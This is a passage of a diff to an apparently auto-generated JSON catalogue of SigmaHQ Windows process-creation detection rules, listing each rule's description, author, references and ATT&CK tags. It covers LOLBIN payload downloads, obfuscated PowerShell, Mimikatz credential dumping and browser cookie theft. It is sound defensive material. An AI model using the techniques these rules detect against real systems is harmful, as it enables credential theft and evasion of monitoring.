"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_workfolders.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "0bbc6369-43e3-453d-9944-cae58821c173", - "value": "Execution via WorkFolders.exe" - }, - { - "description": "Detects code execution via the Windows Update client (wuauclt)", - "meta": { - "author": "FPT.EagleEye Team", - "creation_date": "2020/10/17", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_wuauclt.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://dtm.uk/wuauclt/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wuauclt.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.execution", - "attack.t1105", - "attack.t1218" - ] - }, - "uuid": "d7825193-b70a-48a4-b992-8b5b3015cc11", - "value": "Windows Update Client LOLBIN" - }, - { - "description": "Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/02/26", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_wuauclt_cmdline.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://redcanary.com/blog/blackbyte-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wuauclt_cmdline.yml" + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", + "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3", + "https://twitter.com/splinter_code/status/1483815103279603714", + "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_advancedrun_priv_user.yml" ], "tags": "No established tags" }, - "uuid": "52d097e2-063e-4c9c-8fbb-855c8948d135", - "value": "Suspicious Windows Update Agent Empty Cmdline" + "uuid": "fa00b701-44c6-4679-994d-5a18afa8a707", + "value": "Suspicious AdvancedRun Runas Priv User" }, { - "description": "ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.", + "description": "Detects an attempt to add a potentially crafted DLL as a plug in of the DNS Service.\nDetects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain.\nDNS zones used to host the DNS records for a particular domain\n", "meta": { - "author": "frack113", - "creation_date": "2021/11/07", + "author": "@gott_cyber", + "creation_date": "2022/07/31", "falsepositive": [ - "Unknown" + "Legitimate administration use" ], - "filename": "proc_creation_win_susp_zipexec.yml", + "filename": "proc_creation_win_dnscmd_discovery.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/SBousseaden/status/1451237393017839616", - "https://github.com/Tylous/ZipExec", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_zipexec.yml" + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd", + "https://docs.microsoft.com/en-us/azure/dns/dns-zones-records", + "https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.execution", + "attack.t1543.003" + ] + }, + "uuid": "b6457d63-d2a2-4e29-859d-4e7affc153d1", + "value": "Discovery/Execution via dnscmd.exe" + }, + { + "description": "Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder", + "meta": { + "author": "Austin Songer @austinsonger, Florian Roth", + "creation_date": "2021/11/26", + "falsepositive": [ + "Dump64.exe in other folders than the excluded one" + ], + "filename": "proc_creation_win_lolbin_dump64.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mrd0x/status/1460597833917251595", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dump64.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "129966c9-de17-4334-a123-8b58172e664d", + "value": "Suspicious Dump64.exe Execution" + }, + { + "description": "lolbas Cmdl32 is use to download a payload to evade antivirus", + "meta": { + "author": "frack113", + "creation_date": "2021/11/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_cmdl32.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SwiftOnSecurity/status/1455897435063074824", + "https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cmdl32.yml" ], "tags": [ "attack.execution", @@ -55669,179 +44188,796 @@ "attack.t1202" ] }, - "uuid": "90dcf730-1b71-4ae7-9ffc-6fcf62bd0132", - "value": "Suspicious ZipExec Execution" + "uuid": "f37aba28-a9e6-4045-882c-d5004043b337", + "value": "Suspicious Cmdl32 Execution" }, { - "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "description": "Commandline to launch powershell with a base64 payload", "meta": { "author": "frack113", - "creation_date": "2021/07/20", + "creation_date": "2022/01/02", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_susp_zip_compress.yml", + "filename": "proc_creation_win_susp_powershell_encode.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_zip_compress.yml" + "https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-20---powershell-invoke-known-malicious-cmdlets", + "https://mikefrobbins.com/2017/06/15/simple-obfuscation-with-powershell-using-base64-encoding/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_encode.yml" ], "tags": [ - "attack.collection", - "attack.t1074.001" + "attack.execution", + "attack.t1059.001" ] }, - "uuid": "85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98", - "value": "Zip A Folder With PowerShell For Staging In Temp" + "uuid": "fb843269-508c-4b76-8b8d-88679db22ce7", + "value": "Suspicious Execution of Powershell with Base64" }, { - "description": "Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", "meta": { - "author": "Janantha Marasinghe (https://github.com/blueteam0ps)", - "creation_date": "2021/02/02", + "author": "frack113", + "creation_date": "2022/02/11", "falsepositive": [ - "Admin activity" + "Legitimate use" ], - "filename": "proc_creation_win_sus_auditpol_usage.yml", + "filename": "proc_creation_win_anydesk.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_anydesk.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "b52e84a3-029e-4529-b09b-71d19dd27e94", + "value": "Use of Anydesk Remote Access Software" + }, + { + "description": "Atbroker executing non-deafualt Assistive Technology applications", + "meta": { + "author": "Mateusz Wydra, oscd.community", + "creation_date": "2020/10/12", + "falsepositive": [ + "Legitimate, non-default assistive technology applications execution" + ], + "filename": "proc_creation_win_lolbin_susp_atbroker.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sus_auditpol_usage.yml" + "https://lolbas-project.github.io/lolbas/Binaries/Atbroker/", + "http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_atbroker.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.t1218" ] }, - "uuid": "0a13e132-651d-11eb-ae93-0242ac130002", - "value": "Suspicious Auditpol Usage" + "uuid": "f24bcaea-0cd1-11eb-adc1-0242ac120002", + "value": "Suspicious Atbroker Execution" }, { - "description": "Detects the usage of Sysinternals Tools due to accepteula option being seen in the command line.", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block", "meta": { - "author": "Markus Neis", - "creation_date": "2017/08/28", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "creation_date": "2019/11/08", "falsepositive": [ - "Legitimate use of SysInternals tools", - "Programs that use the same Registry Key" + "Unknown" ], - "filename": "proc_creation_win_sysinternals_eula_accepted.yml", - "level": "low", + "filename": "proc_creation_win_invoke_obfuscation_obfuscated_iex_commandline.yml", + "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/Moti_B/status/1008587936735035392", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_eula_accepted.yml" + "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_obfuscated_iex_commandline.yml" ], "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ] }, - "uuid": "7cccd811-7ae9-4ebe-9afd-cb5c406b824b", - "value": "Usage of Sysinternals Tools" + "uuid": "4bf943c6-5146-4273-98dd-e958fd1e3abf", + "value": "Invoke-Obfuscation Obfuscated IEX Invocation" }, { - "description": "Detects usage of Sysinternals PsService for service reconnaissance or tamper", + "description": "Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p.", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/16", + "author": "Julia Fomina, oscd.community", + "creation_date": "2020/10/09", "falsepositive": [ - "Legitimate use of PsService by an administrator" + "Unlikely" ], - "filename": "proc_creation_win_sysinternals_psservice.yml", + "filename": "proc_creation_win_lolbin_rasautou_dll_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/psservice", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psservice.yml" + "https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html", + "https://github.com/fireeye/DueDLLigence", + "https://lolbas-project.github.io/lolbas/Binaries/Rasautou/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "cd3d1298-eb3b-476c-ac67-12847de55813", + "value": "DLL Execution via Rasautou.exe" + }, + { + "description": "Detects events that appear when a user click on a link file with a powershell command in it", + "meta": { + "author": "frack113", + "creation_date": "2022/02/06", + "falsepositive": [ + "Legitimate commands in .lnk files" + ], + "filename": "proc_creation_win_embed_exe_lnk.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.x86matthew.com/view_post?id=embed_exe_lnk", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_embed_exe_lnk.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "30e92f50-bb5a-4884-98b5-d20aa80f3d7a", + "value": "Hidden Powershell in Link File Pattern" + }, + { + "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", + "meta": { + "author": "frack113", + "creation_date": "2021/12/10", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_sharpview.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1", + "https://github.com/tevora-threat/SharpView/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml" ], "tags": [ "attack.discovery", + "attack.t1049", + "attack.t1069.002", + "attack.t1482", + "attack.t1135", + "attack.t1033" + ] + }, + "uuid": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", + "value": "Suspicious Execution of SharpView Aka PowerView" + }, + { + "description": "Detects suspicious IIS native-code module installations via command line", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/12/11", + "falsepositive": [ + "Unknown as it may vary from organisation to organisation how admins use to install IIS modules" + ], + "filename": "proc_creation_win_susp_iss_module_install.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", + "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_iss_module_install.yml" + ], + "tags": [ "attack.persistence", - "attack.t1543.003" + "attack.t1505.003" ] }, - "uuid": "3371f518-5fe3-4cf6-a14b-2a0ae3fd8a4f", - "value": "Use of Sysinternals PsService" + "uuid": "9465ddf4-f9e4-4ebd-8d98-702df3a93239", + "value": "IIS Native-Code Module Command Line Installation" }, { - "description": "Detects the use of SharpEvtHook, a tool to tamper with Windows event logs", + "description": "ForceV1 asks for information directly from the kernel space. Conhost connects to the console application. High IntegrityLevel means the process is running with elevated privileges, such as an Administrator context.", "meta": { - "author": "Florian Roth", - "creation_date": "2022/09/07", + "author": "frack113", + "creation_date": "2022/12/09", "falsepositive": [ - "Unknown" + "Very Likely, including launching cmd.exe via Run As Administrator" ], - "filename": "proc_creation_win_sysmon_disable_sharpevtmute.yml", - "level": "high", + "filename": "proc_creation_win_susp_conhost_option.yml", + "level": "informational", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/bats3c/EvtMute", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysmon_disable_sharpevtmute.yml" + "https://cybercryptosec.medium.com/covid-19-cyber-infection-c615ead7c29", + "https://learn.microsoft.com/en-us/windows/win32/secauthz/mandatory-integrity-control", + "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_conhost_option.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.t1202" ] }, - "uuid": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", - "value": "SharpEvtMute EvtMuteHook Load" + "uuid": "3037d961-21e9-4732-b27a-637bcc7bf539", + "value": "Suspicious High IntegrityLevel Conhost Legacy Option" }, { - "description": "Detect possible Sysmon driver unload", + "description": "Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation)", "meta": { - "author": "Kirill Kiryanov, oscd.community", - "creation_date": "2019/10/23", + "author": "Andreas Hunkeler (@Karneades), Nasreddine Bencherchali", + "creation_date": "2021/12/17", "falsepositive": [ - "Unknown" + "Legitimate calls to system binaries", + "Company specific internal usage" ], - "filename": "proc_creation_win_sysmon_driver_unload.yml", - "level": "high", + "filename": "proc_creation_win_shell_spawn_by_java.yml", + "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysmon_driver_unload.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shell_spawn_by_java.yml" ], "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1562", - "attack.t1562.002" + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ] }, - "uuid": "4d7cda18-1b12-4e52-b45c-d28653210df8", - "value": "Sysmon Driver Unload" + "uuid": "dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0", + "value": "Shells Spawned by Java" }, { - "description": "Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)", + "description": "Detects suspicious powershell execution that ends with a common flag instead of a command or a filename to execute (could be a sign of implicit execution that uses files in WindowsApps directory)", "meta": { - "author": "Florian Roth", - "creation_date": "2022/11/10", + "author": "pH-T, Florian Roth", + "creation_date": "2022/04/08", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_sysmon_exploitation.yml", + "filename": "proc_creation_win_schtasks_powershell_windowsapps_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41120", - "https://twitter.com/filip_dragovic/status/1590052248260055041", - "https://twitter.com/filip_dragovic/status/1590104354727436290", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysmon_exploitation.yml" + "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_powershell_windowsapps_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.t1053.005", + "attack.t1059.001" + ] + }, + "uuid": "b66474aa-bd92-4333-a16c-298155b120df", + "value": "Suspicious Powershell No File or Command" + }, + { + "description": "Detects persitence via netsh helper", + "meta": { + "author": "Victor Sergeev, oscd.community", + "creation_date": "2019/10/25", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_netsh_dll_persistence.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://attack.mitre.org/software/S0108/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.007/T1546.007.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsh_dll_persistence.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1546.007", + "attack.s0108" + ] + }, + "uuid": "56321594-9087-49d9-bf10-524fe8479452", + "value": "Suspicious Netsh DLL Persistence" + }, + { + "description": "Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process", + "meta": { + "author": "frack113", + "creation_date": "2022/11/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_msbuild.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.echotrail.io/insights/search/msbuild.exe", + "https://app.any.run/tasks/abdf586e-df0c-4d39-89a7-06bf24913401/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_msbuild.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "33be4333-2c6b-44f4-ae28-102cdbde0a31", + "value": "Suspicious Msbuild Execution By Uncommon Parent Process" + }, + { + "description": "Detection well-known mimikatz command line arguments", + "meta": { + "author": "Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton", + "creation_date": "2019/10/22", + "falsepositive": [ + "Legitimate Administrator using tool for password recovery" + ], + "filename": "proc_creation_win_mimikatz_command_line.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://tools.thehacker.recipes/mimikatz/modules", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mimikatz_command_line.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006" + ] + }, + "uuid": "a642964e-bead-4bed-8910-1bb4d63e3b4d", + "value": "Mimikatz Command Line" + }, + { + "description": "Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/09/06", + "falsepositive": [ + "System administrator usage" + ], + "filename": "proc_creation_win_renamed_sdelete.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_sdelete.yml" + ], + "tags": [ + "attack.impact", + "attack.t1485" + ] + }, + "uuid": "c1d867fe-8d95-4487-aab4-e53f2d339f90", + "value": "Renamed Sysinternals Sdelete Usage" + }, + { + "description": "Detects a code page switch in command line or batch scripts to a rare language", + "meta": { + "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2019/10/14", + "falsepositive": [ + "Administrative activity (adjust code pages according to your organisation's region)" + ], + "filename": "proc_creation_win_susp_codepage_switch.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/cglyer/status/1183756892952248325", + "https://docs.microsoft.com/en-us/windows/win32/intl/code-page-identifiers", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_codepage_switch.yml" + ], + "tags": [ + "attack.t1036", + "attack.defense_evasion" + ] + }, + "uuid": "c7942406-33dd-4377-a564-0f62db0593a3", + "value": "Suspicious Code Page Switch" + }, + { + "description": "Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_chromium_headless_debugging.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://embracethered.com/blog/posts/2020/cookie-crimes-on-mirosoft-edge/", + "https://github.com/defaultnamehere/cookie_crimes/", + "https://mango.pdf.zone/stealing-chrome-cookies-without-a-password", + "https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chromium_headless_debugging.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1185" + ] + }, + "uuid": "3e8207c5-fcd2-4ea6-9418-15d45b4890e4", + "value": "Potential Data Stealing Via Chromium Headless Debugging" + }, + { + "description": "Detects suspicious ways to run Invoke-Execution using IEX acronym", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/24", + "falsepositive": [ + "Legitimate scripts that use IEX" + ], + "filename": "proc_creation_win_susp_powershell_iex_patterns.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_iex_patterns.yml" ], "tags": "No established tags" }, - "uuid": "6d1058a4-407e-4f3a-a144-1968c11dc5c3", - "value": "Suspicious Sysmon as Execution Parent" + "uuid": "09576804-7a05-458e-a817-eb718ca91f54", + "value": "Suspicious PowerShell IEX Execution Patterns" + }, + { + "description": "Detects possible NTLM coercion via certutil using the 'syncwithWU' flag", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_certutil_ntlm_coercion.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/issues/243", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "6c6d9280-e6d0-4b9d-80ac-254701b64916", + "value": "NTLM Coercion Via Certutil.exe" + }, + { + "description": "Detects when attackers use \"sc.exe\" or the powershell \"Set-Service\" cmdlet to change the startup type of a service to \"disabled\"", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/01", + "falsepositive": [ + "Administrators settings a service to disable via script or cli for testing purposes" + ], + "filename": "proc_creation_win_disable_service.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_disable_service.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "85c312b7-f44d-4a51-a024-d671c40b49fc", + "value": "Sc Or Set-Service Cmdlet Execution to Disable Services" + }, + { + "description": "Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand", + "meta": { + "author": "Teymur Kheirkhabarov", + "creation_date": "2019/10/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_using_sc_to_change_sevice_image_path_by_non_admin.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://pentestlab.blog/2017/03/30/weak-service-permissions/", + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_using_sc_to_change_sevice_image_path_by_non_admin.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" + ] + }, + "uuid": "d937b75f-a665-4480-88a5-2f20e9f9b22a", + "value": "Possible Privilege Escalation via Weak Service Permissions" + }, + { + "description": "Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL", + "meta": { + "author": "FPT.EagleEye", + "creation_date": "2020/12/25", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_emotet_rundll32_execution.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://cyber.wtf/2021/11/15/guess-whos-back/", + "https://paste.cryptolaemus.com/emotet/2020/12/22/emotet-malware-IoCs_12-22-20.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_emotet_rundll32_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "54e57ce3-0672-46eb-a402-2c0948d5e3e9", + "value": "Emotet RunDLL32 Process Creation" + }, + { + "description": "Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support)", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/02/11", + "falsepositive": [ + "Legitimate use by administrative staff" + ], + "filename": "proc_creation_win_susp_screenconnect_access.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_screenconnect_access.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1133" + ] + }, + "uuid": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", + "value": "ScreenConnect Remote Access" + }, + { + "description": "A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_sdclt_child_process.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.html", + "https://github.com/OTRF/detection-hackathon-apt29/issues/6", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdclt_child_process.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "da2738f2-fadb-4394-afa7-0a0674885afa", + "value": "Sdclt Child Processes" + }, + { + "description": "Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators", + "meta": { + "author": "FLorian Roth", + "creation_date": "2022/07/21", + "falsepositive": [ + "Legitimate administrative tasks" + ], + "filename": 